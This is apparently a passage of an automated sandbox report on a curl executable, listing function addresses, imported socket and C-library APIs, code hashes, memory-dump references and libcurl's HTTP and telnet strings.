Opcode ID: 001bf0e5d3f4d1e911aeec72e017570705d677bd373953bfee9cdcbd1913370e
Instruction ID: 402e9e07515a754cb07df1cd439b2b34699217e37cd74ee6ee99030ed5cbe292
Opcode Fuzzy Hash: 001bf0e5d3f4d1e911aeec72e017570705d677bd373953bfee9cdcbd1913370e
Instruction Fuzzy Hash: 69315E71A002198BCB25DF68D9807DEB7F5BB88310F4086ABD95997344DB389A808F95

Function 0041474C Relevance: 3.1, APIs: 2, Instructions: 74networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00414696
WSAGetLastError.WS2_32 ref: 004146A8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: cda3352bfdf1f9e3ffa4935576cbb01aa52df1db6f2df41d18b06ece867ad1cf
Instruction ID: 22298e071b8e527ac223ec24291b5740abcf60e4714e350d0d25e13332433026
Opcode Fuzzy Hash: cda3352bfdf1f9e3ffa4935576cbb01aa52df1db6f2df41d18b06ece867ad1cf
Instruction Fuzzy Hash: DC314F75A003198FCB25DF29C8846DEB7F5BB88310F4086AFE95D97394DB389A808F55

Function 00414709 Relevance: 3.0, APIs: 2, Instructions: 47networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00414696
WSAGetLastError.WS2_32 ref: 004146A8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: 520878403b40177a63cce1b35b298c9f5277388d5450305bf5f66040af881969
Instruction ID: 6215c35ba61c27cf76d696c3de3f4fc2a24442b03fce012f7b3d6518783acc31
Opcode Fuzzy Hash: 520878403b40177a63cce1b35b298c9f5277388d5450305bf5f66040af881969
Instruction Fuzzy Hash: 8E113A70A043198BCB20DF68D8847DAB7F4BF94324F1086AFE45887350D7389AC08F56

Function 0040F96C Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0040F179
fputc.MSVCRT ref: 0040F986

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputc
String ID:
API String ID: 1992160199-0
Opcode ID: e690617d18303927e967ea9ba922e4ea551bff1715a765e83fe020636de47e0c
Instruction ID: b741921693586527a0e0d42b9b118aa899ca8383ad80fd3493f1aa97d81ead14
Opcode Fuzzy Hash: e690617d18303927e967ea9ba922e4ea551bff1715a765e83fe020636de47e0c
Instruction Fuzzy Hash: 82F049715483148BC6209F68DC8016777E06B48318F144E7EE8EDA77D0D239AE499745

Function 00410920 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 004108CD
ExpandEnvironmentStringsA.KERNEL32 ref: 004108F2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: EnvironmentExpandStringsgetenv
String ID:
API String ID: 4247756900-0
Opcode ID: eafae4c764d1f5cfa404a64f75f1a9f277944294883389717b9a13af8d76a54f
Instruction ID: 2ffa96b5ffbecc2df42d2eaa329adb58b991e835d9a8064fa04225b6695044ce
Opcode Fuzzy Hash: eafae4c764d1f5cfa404a64f75f1a9f277944294883389717b9a13af8d76a54f
Instruction Fuzzy Hash: B4F030B05043489BDB10EF35D9893DDBBF4AB01348F04449D94C993242D7B89AC9DF56

Function 00410C90 Relevance: 3.0, APIs: 2, Instructions: 27networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00410CAA
WSACleanup.WS2_32 ref: 00410CCB

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: CleanupStartup
String ID:
API String ID: 915672949-0
Opcode ID: 2253149ff17c21890a5a7da0e7903b2fa066fe5bfb43054eeb9396fd5a3c7a50
Instruction ID: 84471728386fe4fd93a80fa437b84cafa561af1f14a5ed0e9171873e7289441e
Opcode Fuzzy Hash: 2253149ff17c21890a5a7da0e7903b2fa066fe5bfb43054eeb9396fd5a3c7a50
Instruction Fuzzy Hash: A6E09B3470020447D7546728D90E3D776E6B781341F544176D489C2745FAB8CCC7CE9E

Function 0040F2F8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0040F179

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputc
String ID:
API String ID: 1992160199-0
Opcode ID: e6627508145fc5d5d24b0283b2190dfa9abd0ab486e9b1c0256286a8497eb783
Instruction ID: 5559bb3418315d0355b93361dc68f03f8cd898a3ea0b391a602dd7645dfc826b
Opcode Fuzzy Hash: e6627508145fc5d5d24b0283b2190dfa9abd0ab486e9b1c0256286a8497eb783
Instruction Fuzzy Hash: B32162755083148BC720DF18C44016AB7E0AF88724F194A7EECE8A7791D379ED858B86

Function 00416879 Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 004168AF
WSAGetLastError.WS2_32 ref: 004168D2

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: 2cebea54fbad3d7f2f8b4eacc607eb27eabd662688b5b435ed41ac37a7d9caf8
Instruction ID: 1998ec84ff5e3dc7f34718f2e874567752f0958625614ba6d16aebcb3955d317
Opcode Fuzzy Hash: 2cebea54fbad3d7f2f8b4eacc607eb27eabd662688b5b435ed41ac37a7d9caf8
Instruction Fuzzy Hash: FFF0DA75605308AFDB11EF6DD88879ABBF4FB48364F008969FD6897340D335A854CBA2

Function 0041513C Relevance: 1.5, APIs: 1, Instructions: 28networkCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004150D3
socket.WS2_32 ref: 00415153

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpysocket
String ID:
API String ID: 3436932642-0
Opcode ID: 0ed8474249c58b3f5d879b9e0ceceb543ad15cdc4f349281a797a034d7f13a38
Instruction ID: 123fad3c17d800dd849203eddd1f1cb2b7bcea257d4d3eb4df70d91c0db9190b
Opcode Fuzzy Hash: 0ed8474249c58b3f5d879b9e0ceceb543ad15cdc4f349281a797a034d7f13a38
Instruction Fuzzy Hash: 8DF03A35A00601EFCB11DF2CD0842CAB7E1FB88320F14856AE8588B315D734A8858B81

Function 0040FCEC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0040FD0B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputc
String ID:
API String ID: 1992160199-0
Opcode ID: 233a14567e44321590b312ef4fa03fc3a70c074f39a859032fe029519e5097d3
Instruction ID: 416a6a7492bf0fe0d9d9bb60768b3adef75b33032190dffbd1938f7ccce91191
Opcode Fuzzy Hash: 233a14567e44321590b312ef4fa03fc3a70c074f39a859032fe029519e5097d3
Instruction Fuzzy Hash: FBE0C272A0C6048AC7304A38AC400BAF7D0BB84360F65053FD5ADD7AD0E3399A4DA6C6

Function 004025EC Relevance: 1.5, APIs: 1, Instructions: 19filestringCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00402605
_errno.MSVCRT ref: 00402654
strerror.MSVCRT ref: 00402661

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _errnofopenstrerror
String ID:
API String ID: 399915861-0
Opcode ID: ba1a8fa808c4b56b31f2da5ec8636fb764debe397010c6af9a9a4cdb3fea8da5
Instruction ID: 233af74a075b0dff260b705bfae2f34f12b9e6cf22ee3e66f8858865a1937357
Opcode Fuzzy Hash: ba1a8fa808c4b56b31f2da5ec8636fb764debe397010c6af9a9a4cdb3fea8da5
Instruction Fuzzy Hash: 03F062B0504B018FD320CF25C158317BBE0BB58308F108A1DD49A57781D3B9E489CF96

Function 0040FD3C Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0040F179
fputc.MSVCRT ref: 0040FD5B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputc
String ID:
API String ID: 1992160199-0
Opcode ID: bdeb057b4aafa5c0f0d2b325754155a01c1f54f6bb90965de09fde30c5f22514
Instruction ID: 1c221b7119783590df8d6df792ad47f474c9174587b4860fbfde574e5f811565
Opcode Fuzzy Hash: bdeb057b4aafa5c0f0d2b325754155a01c1f54f6bb90965de09fde30c5f22514
Instruction Fuzzy Hash: 53D0C2366096008AC6304A3CA84407BB7D0AB84329F240A7EE2BDA7BD0C139E9089785

Function 00413E40 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00413E68

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 141c78574ce9e3700a0240f096f17c7b4859a226ee703edda2aae0a94dfb28f3
Instruction ID: b2ee65d8e3e82073edb558d9ff431fe3c9c04323597a9e2aedb00d9c7b80ed1a
Opcode Fuzzy Hash: 141c78574ce9e3700a0240f096f17c7b4859a226ee703edda2aae0a94dfb28f3
Instruction Fuzzy Hash: 5FE0EC74D04208AFC700EF78D54558EBBF5EB48204F01C5699C48D3344EB74D5549B82

Function 00418E90 Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00418EA4

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: 460edd5786643fb906392d1eb05a5e5e2debda2eb2e20b4f3339f1a4c2effe4c
Instruction ID: 629c0ef109a07119b3b6efbaf605636ccfefa01da0fea395530ffb5032de7922
Opcode Fuzzy Hash: 460edd5786643fb906392d1eb05a5e5e2debda2eb2e20b4f3339f1a4c2effe4c
Instruction Fuzzy Hash: 3D21EBB05057008FEB50AF25D8843967AE0BF04355F1A497DED998F38AEB7988808F65

Non-executed Functions

Function 00427A80 Relevance: 150.4, APIs: 24, Strings: 61, Instructions: 1606COMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 00427D82

Strings

Content-Range:, xrefs: 004280EE
User-Agent:, xrefs: 00427B5E
], xrefs: 0042871E
upload completely sent off: %I64d out of %I64d bytes, xrefs: 0042929C
Failed sending PUT request, xrefs: 004294CE
Could not seek stream, xrefs: 00428632
Referer: %s, xrefs: 004286C6
TE:, xrefs: 00427C66
Could not get Content-Type header line!, xrefs: 00429684
Proxy-Connection: Keep-Alive, xrefs: 00428B08
%x, xrefs: 00429594
Range: bytes=%s, xrefs: 00428B46
Content-Type: application/x-www-form-urlencoded, xrefs: 00429490
%s%s=%s, xrefs: 004283B4
Could only read %I64d bytes from the input, xrefs: 00428FC7
Content-Length: %I64d, xrefs: 004290C6, 004292EE, 004296A8
0, xrefs: 00429409, 004296D9
Host: %s%s%s, xrefs: 00428660
Proxy-Connection:, xrefs: 00428AF6
Accept-Encoding: %s, xrefs: 00428445
Transfer-Encoding: chunked, xrefs: 00428513
Referer:, xrefs: 00427C02
GET, xrefs: 00427DE0
%s , xrefs: 00428140
Transfer-Encoding:, xrefs: 00427C7E, 00427C9E
Content-Type:, xrefs: 00428537, 00428CFE
%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 004282CB
HEAD, xrefs: 00427DCF
Host: %s%s%s:%hu, xrefs: 00427D62
Accept-Encoding:, xrefs: 00427C4E
%s%s, xrefs: 00428910
100-continue, xrefs: 00428D2E
Accept: */*, xrefs: 00428091
Host:, xrefs: 00427CD9
Cookie: , xrefs: 004283E4, 00428B80
1.0, xrefs: 004285A3
ftp://, xrefs: 00427FDF
Internal HTTP POST error!, xrefs: 0042937A
Expect:, xrefs: 00428D16, 00428D36
Failed sending HTTP POST request, xrefs: 004294B7
Content-Range: bytes %s/%I64d, xrefs: 00428BDA
Content-Range: bytes 0-%I64d/%I64d, xrefs: 0042902A
File already completely uploaded, xrefs: 00428A50
ftp://%s:%s@%s, xrefs: 004285DB
Content-Length:, xrefs: 004290A6, 00429137, 004292CE
Chunky upload is not supported by HTTP 1.0, xrefs: 00429004
chunked, xrefs: 00427C96
Failed sending HTTP request, xrefs: 00429475
Connection:, xrefs: 00428472
Accept:, xrefs: 0042807D
Range:, xrefs: 00428694
Failed sending POST request, xrefs: 00428FA8, 0042921F
/, xrefs: 00428C43
;type=%c, xrefs: 00428C59
%s, TETE: gzip, xrefs: 004284AD
Connection: TETE: gzip, xrefs: 00428B1B
Cookie:, xrefs: 00427C2E
1.1, xrefs: 0042810D
;type=, xrefs: 00428001
Content-Range: bytes %s%I64d/%I64d, xrefs: 00428AC9
Content-Length: 0, xrefs: 00428F5C

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintf
String ID: %s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%s, TETE: gzip$%x$/$0$1.0$1.1$100-continue$;type=$;type=%c$Accept-Encoding:$Accept-Encoding: %s$Accept:$Accept: */*$Chunky upload is not supported by HTTP 1.0$Connection:$Connection: TETE: gzip$Content-Length:$Content-Length: %I64d$Content-Length: 0$Content-Range:$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Content-Type:$Content-Type: application/x-www-form-urlencoded$Cookie:$Cookie: $Could not get Content-Type header line!$Could not seek stream$Could only read %I64d bytes from the input$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host:$Host: %s%s%s$Host: %s%s%s:%hu$Internal HTTP POST error!$Proxy-Connection:$Proxy-Connection: Keep-Alive$Range:$Range: bytes=%s$Referer:$Referer: %s$TE:$Transfer-Encoding:$Transfer-Encoding: chunked$User-Agent:$]$chunked$ftp://$ftp://%s:%s@%s$upload completely sent off: %I64d out of %I64d bytes
API String ID: 3307269620-1243748717
Opcode ID: 74940448ea03e5ab680e46e1e14f069c2f42e54d9a2ec1b8699222b7c92ec032
Instruction ID: 0f3e33b202a15e8c3dd7c090391940251250606f041e93ebf27cbcc39c07c819
Opcode Fuzzy Hash: 74940448ea03e5ab680e46e1e14f069c2f42e54d9a2ec1b8699222b7c92ec032
Instruction Fuzzy Hash: 17F222B06097108FC710EF29D58476BBBE1BF84344F55892EE8898B351EB78E845CF4A

Function 00430450 Relevance: 114.8, APIs: 34, Strings: 31, Instructions: 1052stringnetworkCOMMON

Download Yara Rule

APIs

strncpy.MSVCRT ref: 0043057F
sscanf.MSVCRT ref: 004305BB
strncpy.MSVCRT ref: 00430610
FreeLibrary.KERNEL32 ref: 00430671
curl_slist_append.CURL ref: 004306F8
WSAStartup.WS2_32 ref: 004307D3
curl_slist_free_all.CURL ref: 00430860
curl_msnprintf.CURL ref: 004308A3
curl_slist_append.CURL ref: 004308BB

Strings

BINARY, xrefs: 00430734
failed to find WSAEnumNetworkEvents function (%d), xrefs: 004312E0
failed to load WS2_32.DLL (%d), xrefs: 00430D0A
RCVD, xrefs: 00431054, 004310D5, 00431176, 004311F7, 004313C5
d, xrefs: 00430D88
WSACreateEvent, xrefs: 00430946
USER,%s, xrefs: 00430886
WSAEventSelect, xrefs: 0043098A
WSACreateEvent failed (%d), xrefs: 004312F7
!, xrefs: 004309DE
FreeLibrary(wsock2) failed (%d), xrefs: 0043134A
WSACloseEvent failed (%d), xrefs: 0043136F
WS2_32.DLL, xrefs: 0043091C
Unknown telnet option %s, xrefs: 004308E7
TTYPE, xrefs: 004305C9
failed to find WSACloseEvent function (%d), xrefs: 00430D66
In SUBOPTION processing, RCVD, xrefs: 00430ED7
failed to find WSAEventSelect function (%d), xrefs: 00430D7A
%hu%*[xX]%hu, xrefs: 00430786
NEW_ENV, xrefs: 004306D1
failed to find WSACreateEvent function (%d), xrefs: 00430D2F
(, xrefs: 0043175F
WSAEnumNetworkEvents, xrefs: 004309AA
Syntax error in telnet option: %s, xrefs: 0043083D
Time-out, xrefs: 00430C35
%127[^= ]%*[ =]%255s, xrefs: 004305AE
WSAEnumNetworkEvents failed (%d), xrefs: 0043132A
WSACloseEvent, xrefs: 00430966
WSAStartup failed (%d), xrefs: 004307EA
